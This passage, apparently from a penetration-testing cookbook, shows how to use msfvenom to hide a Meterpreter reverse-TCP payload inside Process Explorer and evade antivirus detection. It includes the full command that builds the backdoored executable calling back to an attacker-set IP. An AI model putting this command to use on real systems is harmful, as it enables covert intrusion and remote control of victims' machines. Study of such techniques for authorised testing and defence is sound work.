Templates
Backdooring known applications can be a good way to compromise a target, for example, when you are already on the internal network and get access to the internal software repository. Also, by using a custom template, you may be able to bypass some security solutions that are using the default template to detect Metasploit payloads.
Getting ready
MSFvenom, by default, uses the templates in the /usr/share/metasploit-framework/data/templates
directory, but we can choose to use our own, using the -x
option.
How to do it...
- Using the
-x
option, we can specify our own template; in this recipe we will use Process Explorer from Windows Sysinternals, and, by using the-k
option, we can run your payload as a new thread from the template:
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.216.5 -x procexp.exe -k -f exe -o procexp-backdoored.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload...